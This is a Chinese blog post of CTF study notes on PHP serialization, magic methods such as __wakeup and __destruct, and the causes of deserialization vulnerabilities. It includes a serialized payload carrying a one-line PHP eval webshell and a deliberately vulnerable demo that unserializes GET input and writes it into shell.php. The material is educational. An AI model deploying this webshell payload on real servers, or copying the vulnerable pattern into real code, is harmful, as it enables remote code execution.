<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">
<script>
(function(){
 if(''){
 if (prompt('请输入文章密码') !== ''){
                 alert('密码错误！');
                                 history.back();
                                             
 }
         
 }
     
 })();
</script>


  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-mac-osx.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web," />





  <link rel="alternate" href="/atom.xml" title="v1rus blog" type="application/atom+xml" />






<meta name="description" content="php序列化杂记今天比了赛 也认识到自己的能力有限 但是这一个月的web题目做下来也不能急于求成什么，继续努力 这是今天的php序列化代码： 1234567891011121314151617&lt;?phpclass FileHandler&amp;#123;	protected $op;    protected $filename;    protected $content;		function">
<meta property="og:type" content="article">
<meta property="og:title" content="php序列化杂记">
<meta property="og:url" content="https://virusday.github.io/2020/05/10/php%E5%BA%8F%E5%88%97%E5%8C%96%E6%9D%82%E8%AE%B0/index.html">
<meta property="og:site_name" content="v1rus blog">
<meta property="og:description" content="php序列化杂记今天比了赛 也认识到自己的能力有限 但是这一个月的web题目做下来也不能急于求成什么，继续努力 这是今天的php序列化代码： 1234567891011121314151617&lt;?phpclass FileHandler&amp;#123;	protected $op;    protected $filename;    protected $content;		function">
<meta property="article:published_time" content="2020-05-10T12:54:20.000Z">
<meta property="article:modified_time" content="2020-05-11T08:47:10.887Z">
<meta property="article:author" content="Virusday">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://virusday.github.io/2020/05/10/php序列化杂记/"/>





  <title>php序列化杂记 | v1rus blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>
<script type="text/javascript" src="/lib/clipboard/clipboard.js"></script>
<script type="text/javascript" src="/js/src/custom.js"></script>
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">v1rus blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">做些有意思的事</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://virusday.github.io/2020/05/10/php%E5%BA%8F%E5%88%97%E5%8C%96%E6%9D%82%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Virusday">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/user.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="v1rus blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">php序列化杂记</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-05-10T20:54:20+08:00">
                2020-05-10
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于&#58;</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2020-05-11T16:47:10+08:00">
                2020-05-11
              </time>
            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  4k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  16
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="php序列化杂记"><a href="#php序列化杂记" class="headerlink" title="php序列化杂记"></a>php序列化杂记</h1><p>今天比了赛 也认识到自己的能力有限 但是这一个月的web题目做下来也不能急于求成什么，继续努力</p>
<p>这是今天的php序列化代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">FileHandler</span></span>&#123;</span><br><span class="line">	<span class="keyword">protected</span> $op;</span><br><span class="line">    <span class="keyword">protected</span> $filename;</span><br><span class="line">    <span class="keyword">protected</span> $content;</span><br><span class="line">	</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($op=<span class="string">""</span>,$filename=<span class="string">""</span>,$content=<span class="string">""</span>)</span></span>&#123;</span><br><span class="line"> </span><br><span class="line">	<span class="keyword">$this</span>-&gt;op = $op;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;filename = $filename;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;content = $content;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">$class4 = <span class="keyword">new</span> FileHandler(<span class="string">"2"</span>,<span class="string">"haha.php"</span>,<span class="string">"&lt;?php eval(@\$_POST['a']); ?&gt;"</span>);</span><br><span class="line">$class4_ser = serialize($class4);	</span><br><span class="line">print_r($class4_ser);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这里是输出结果：</p>
<p><code>O:11:&quot;FileHandler&quot;:3:{s:5:&quot;*op&quot;;s:1:&quot;2&quot;;s:11:&quot;*filename&quot;;s:8:&quot;haha.php&quot;;s:10:&quot;*content&quot;;s:28:&quot;&quot;;}</code></p>
<p>这里有几个点我要注意一下：</p>
<ol>
<li><p>这些变量名前的修饰时protected，在序列化的时候会不一样</p>
</li>
<li><p>这里序列化的大括号里s都少了2个字节原因是实际的”s“是%00*op%00，%00代表终止符，null</p>
</li>
<li><p>一句话木马那一行转义了dollar符号＄，注意是反斜杠转义。</p>
</li>
<li><p><strong>print_r()</strong> 函数用于打印变量，以更容易理解的形式展示。</p>
</li>
<li><p><strong>print_r()</strong>、 <a href="https://www.php.net/manual/zh/function.var-dump.php" target="_blank" rel="noopener">var_dump()</a>、 <a href="https://www.php.net/manual/zh/function.var-export.php" target="_blank" rel="noopener">var_export()</a> 都会显示对象 protected 和 private 的属性。 Class 的静态属性（static） 则不会显示。  </p>
</li>
</ol>
<p>接下来进入正文介绍：</p>
<h3 id="0x01-PHP的序列化和反序列化"><a href="#0x01-PHP的序列化和反序列化" class="headerlink" title="0x01 PHP的序列化和反序列化"></a>0x01 PHP的序列化和反序列化</h3><h4 id="概念"><a href="#概念" class="headerlink" title="概念"></a>概念</h4><p>这其实是为了解决 <strong>PHP 对象传递</strong>的一个问题,因为 PHP 文件在执行结束以后就会将对象销毁，那么如果下次有一个页面恰好要用到刚刚销毁的对象就会束手无策，总不能你永远不让它销毁，等着你吧，于是人们就想出了一种能<strong>长久保存对象</strong>的方法，这就是 PHP 的序列化，那当我们下次要用的时候只要反序列化一下就 ok 啦</p>
<p>序列化的目的是方便数据的传输和<strong>存储</strong>. json 是为了传递数据的方便性.</p>
<p>序列化示例：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">test</span></span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> $name = <span class="string">'P2hm1n'</span>;  </span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> $sex = <span class="string">'secret'</span>;  </span><br><span class="line"></span><br><span class="line">    <span class="keyword">protected</span> $age = <span class="string">'20'</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$test1 = <span class="keyword">new</span> test();</span><br><span class="line"></span><br><span class="line">$object = serialize($test1);</span><br><span class="line"></span><br><span class="line">print_r($object);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>关键函数 serialize():将PHP中创建的对象，变成一个<strong>字符串</strong></p>
<p>private属性序列化的时候格式是 %00类名%00成员名</p>
<p>protected属性序列化的时候格式是 %00*%00成员名</p>
<p>关键要点：</p>
<p>在Private 权限私有属性序列化的时候格式是 %00类名%00属性名</p>
<p>在Protected 权限序列化的时候格式是 %00*%00属性名</p>
<p>你可能会发现这样一个问题，你这个类定义了那么多方法，怎么把对象序列化了以后全都丢了？你看你整个序列化的字符串里面<strong>全是属性</strong>，就没有一个方法，这是为啥？</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">请记住，序列化他只序列化属性，不序列化方法，这个性质就引出了两个非常重要的话题：</span><br></pre></td></tr></table></figure>

<p>(1)我们在反序列化的时候一定要保证在当前的<strong>作用域环境</strong>下有该类存在</p>
<p>这里不得不扯出反序列化的问题，这里先简单说一下，反序列化就是将我们压缩格式化的对象还原成初始状态的过程（可以认为是解压缩的过程），因为我们没有序列化方法，因此在反序列化以后我们如果想正常使用这个对象的话我们必须要<strong>依托于这个类要在当前作用域存在</strong>的条件。</p>
<p>(2)我们在反序列化攻击的时候也就是<strong>依托类属性</strong>进行攻击</p>
<p>因为没有序列化方法嘛，我们能控制的只有<strong>类的属性</strong>，因此类属性就是我们唯一的攻击入口，在我们的攻击流程中，我们就是要寻找合适的能被我们控制的属性，然后利用它本身的存在的方法，在基于属性被控制的情况下发动我们的发序列化攻击（这是我们攻击的核心思想，这里先借此机会抛出来，大家有一个印象）</p>
<p>关键函数 unserialize():将经过序列化的字符串转换回PHP值</p>
<p>当有 protected 和 private 属性的时候记得补齐空的字符串</p>
<p><strong>__wakeup()魔术方法</strong></p>
<p>unserialize() 会检查是否存在一个 __wakeup() 方法。如果存在，则会先调用 __wakeup 方法，预先准备对象需要的资源。</p>
<p>序列化public private protect参数产生不同结果</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">test</span></span>&#123;</span><br><span class="line">    <span class="keyword">private</span> $test1=<span class="string">"hello"</span>;</span><br><span class="line">    <span class="keyword">public</span> $test2=<span class="string">"hello"</span>;</span><br><span class="line">    <span class="keyword">protected</span> $test3=<span class="string">"hello"</span>;</span><br><span class="line">&#125;</span><br><span class="line">$test = <span class="keyword">new</span> test();</span><br><span class="line"><span class="keyword">echo</span> serialize($test);  <span class="comment">//  O:4:"test":3:&#123;s:11:" test test1";s:5:"hello";s:5:"test2";s:5:"hello";s:8:" * test3";s:5:"hello";&#125;</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这里介绍一下public、private、protected的区别</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">public(公共的):在本类内部、外部类、子类都可以访问</span><br><span class="line"></span><br><span class="line">protect(受保护的):只有本类或子类或父类中可以访问</span><br><span class="line"></span><br><span class="line">private(私人的):只有本类内部可以使用</span><br></pre></td></tr></table></figure>

<p>PHP反序列化标识符含义：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">a - array</span><br><span class="line">b - boolean</span><br><span class="line">d - double</span><br><span class="line">i - integer</span><br><span class="line">o - common object</span><br><span class="line">r - reference</span><br><span class="line">s - string</span><br><span class="line">C - custom object</span><br><span class="line">O - class</span><br><span class="line">N - null</span><br><span class="line">R - pointer reference</span><br><span class="line">U - unicode string</span><br></pre></td></tr></table></figure>



<p>test类定义了三个不同类型(私有，公有，保护)但是值相同的字符串，序列化输出的值不相同 O:4:”test”:3:{s:11:” test test1”;s:5:”hello”;s:5:”test2”;s:5:”hello”;s:8:” * test3”;s:5:”hello”;}</p>
<p>这里的O指Object，代表储存的是对象，如果serialize()传入的是一个数组，那么就是字母a。4代表对象的名称有4个字符。”test”表示对象的名称。3表示对象有三个属性。s代表字符串，11代表长度，后面的代表字符串名称（属性），之后的hello是值。</p>
<p>通过对网页抓取输出是这样的 O:4:”test”:3:{s:11:”\00test\00test1”;s:5:”hello”;s:5:”test2”;s:5:”hello”;s:8:”\00*\00test3”;s:5:”hello”;}</p>
<p>private的参数被反序列化后变成 \00test\00test1 public的参数变成 test2 protected的参数变成 \00*\00test3</p>
<p><code>疑惑的是：%00和\00（&lt;-网页抓取的结果）的区别是什么？</code></p>
<h3 id="0x02-为什么会产生反序列化漏洞？"><a href="#0x02-为什么会产生反序列化漏洞？" class="headerlink" title="0x02 为什么会产生反序列化漏洞？"></a>0x02 为什么会产生反序列化漏洞？</h3><p> 序列化本身没有问题，问题还是那个经典的老大难：<strong>用户输入（  PHP 对象注入漏洞 ）</strong>， 反序列化漏洞的成因在于<strong>代码中的 unserialize() 接收的参数可控</strong> 。我们可以控制序列化和反序列化的参数，就可以篡改对象的属性来达到攻击目的。为了达到我们想实现的目的，就必须对序列化和反序列化过程进行详尽的了解，利用或者绕过某些魔法函数。 </p>
<h4 id="PHP的魔法方法"><a href="#PHP的魔法方法" class="headerlink" title="PHP的魔法方法"></a>PHP的魔法方法</h4><p>PHP 将所有以 __（两个下划线）开头的类方法保留为魔术方法（通常都设置了某些特定条件来触发）。所以在定义类方法时，除了上述魔术方法，建议不要以 __ 为前缀。 常见的魔法方法如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">__construct()，类的构造函数 &lt;-</span><br><span class="line"></span><br><span class="line">__destruct()，类的析构函数，对销毁的时候调用 &lt;-</span><br><span class="line"></span><br><span class="line">__call()，在对象中调用一个不可访问方法时调用</span><br><span class="line"></span><br><span class="line">__callStatic()，用静态方式中调用一个不可访问方法时调用</span><br><span class="line"></span><br><span class="line">__get()，获得一个类的成员变量时调用</span><br><span class="line"></span><br><span class="line">__set()，设置一个类的成员变量时调用</span><br><span class="line"></span><br><span class="line">__isset()，当对不可访问属性调用<span class="keyword">isset</span>()或<span class="keyword">empty</span>()时调用</span><br><span class="line"></span><br><span class="line">__unset()，当对不可访问属性调用<span class="keyword">unset</span>()时被调用。</span><br><span class="line"></span><br><span class="line">__sleep()，执行serialize()时，先会调用这个函数。用于清理对象，并返回一个包含对象中所有变量名称的数组。如果该方法不返回任何内容，则<span class="keyword">NULL</span>被序列化，导致一个E_NOTICE错误 &lt;-</span><br><span class="line"></span><br><span class="line">__wakeup()，执行unserialize()时，先会调用这个函数 &lt;-</span><br><span class="line"></span><br><span class="line">__toString()，类被当成字符串时的回应方法 &lt;-</span><br><span class="line"></span><br><span class="line">__invoke()，调用函数的方式调用一个对象时的回应方法</span><br><span class="line"></span><br><span class="line">__set_state()，调用var_export()导出类时，此静态方法会被调用。</span><br><span class="line"></span><br><span class="line">__clone()，当对象复制完成时调用</span><br><span class="line"></span><br><span class="line">__autoload()，尝试加载未定义的类</span><br><span class="line"></span><br><span class="line">__debugInfo()，打印所需调试信息</span><br></pre></td></tr></table></figure>

<p>(1) __construct()：当对象创建时会自动调用(但在unserialize()时是不会自动调用的)。<br>(2) __wakeup() ：unserialize()时会自动调用<br>(3) __destruct()：当对象被销毁时会自动调用。<br>(4) __toString():当反序列化后的对象被输出在模板中的时候（转换成字符串的时候）自动调用<br>(5) __get() :当从不可访问的属性读取数据<br>(6) __call(): 在对象上下文中调用不可访问的方法时触发<br>(7) sleep()，执行serialize()时，先会调用这个函数。用于清理对象，并返回一个包含对象中所有变量名称的数组。如果该方法不返回任何内容，则NULL被序列化，导致一个E_NOTICE错误 </p>
<ul>
<li>测试代码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">virusday</span></span>&#123;</span><br><span class="line">	<span class="keyword">public</span> $test = <span class="string">'123'</span>;</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span></span>&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"__wakeup"</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">__sleep</span><span class="params">()</span></span>&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"__sleep"</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">		<span class="keyword">return</span> <span class="keyword">array</span>(<span class="string">'test'</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">__toString</span><span class="params">()</span></span>&#123;</span><br><span class="line">     <span class="keyword">return</span> <span class="string">"__toString"</span>.<span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">  &#125;</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">__conStruct</span><span class="params">()</span></span>&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"__construct"</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span></span>&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"__destruct"</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$virusday_1 = <span class="keyword">new</span> virusday();</span><br><span class="line">$data = serialize($virusday_1);</span><br><span class="line">$virusday_2 = unserialize($data);</span><br><span class="line"><span class="keyword">print</span>($virusday_2);</span><br><span class="line"><span class="keyword">print</span>($data.<span class="string">"&lt;/br&gt;"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>输出结果：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">__construct</span><br><span class="line">__sleep    &lt;- serialize</span><br><span class="line">__wakeup</span><br><span class="line">__toString   &lt;- print($virusday_2);</span><br><span class="line">O:8:&quot;virusday&quot;:1:&#123;s:4:&quot;test&quot;;s:3:&quot;123&quot;;&#125;  </span><br><span class="line">__destruct</span><br><span class="line">__destruct</span><br></pre></td></tr></table></figure>



<p>可以看到__destruct函数执行了两次，说明有两个对象被销毁，一个是实例化的对象，还有一个是反序列化后生成的对象。</p>
<h4 id="利用构造函数"><a href="#利用构造函数" class="headerlink" title="利用构造函数"></a>利用构造函数</h4><h5 id="Magic-function"><a href="#Magic-function" class="headerlink" title="Magic function"></a>Magic function</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">virusday</span></span>&#123;</span><br><span class="line">	<span class="keyword">var</span> $test = <span class="string">'123'</span>;</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span></span>&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"__wakeup"</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span>&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"__construct"</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span></span>&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"__destruct"</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">$class2 = <span class="string">'O:8:"virusday":1:&#123;s:4:"test";s:3:"123";&#125;'</span>;</span><br><span class="line">	print_r($class2);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">$class2_unser = unserialize($class2);</span><br><span class="line">print_r($class2_unser);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="利用场景"><a href="#利用场景" class="headerlink" title="利用场景"></a>利用场景</h4><h5 id="wakeup-或-destruct"><a href="#wakeup-或-destruct" class="headerlink" title="__wakeup() 或__destruct()"></a><code>__wakeup() 或__destruct()</code></h5><p>由前可以看到，<strong>unserialize()</strong>后会导致<strong><code>__wakeup()</code></strong>或<strong><code>__destruct()</code></strong>的直接调用(唤醒或者销毁)，中间无需其他过程。因此最理想的情况就是一些漏洞/危害代码在<strong>wakeup() 或</strong><strong>destruct()</strong>中，从而当我们控制序列化字符串时可以去直接触发它们。这里针对 __wakeup() 场景做个实验。假设index源码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">virusday</span></span>&#123;	</span><br><span class="line">    <span class="keyword">var</span> $test = <span class="string">'123'</span>;	</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span></span>&#123;		</span><br><span class="line">        $fp = fopen(<span class="string">"shell.php"</span>,<span class="string">"w"</span>) ;		</span><br><span class="line">        fwrite($fp,<span class="keyword">$this</span>-&gt;test);		</span><br><span class="line">        fclose($fp);	</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$class3 = $_GET[<span class="string">'test'</span>];</span><br><span class="line">print_r($class3);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">$class3_unser = unserialize($class3);</span><br><span class="line"><span class="keyword">require</span> <span class="string">"shell.php"</span>;<span class="comment">// 为显示效果，把这个shell.php包含进来<span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>



<p>同目录下有个空的shell.php文件。一开始访问index.php。</p>
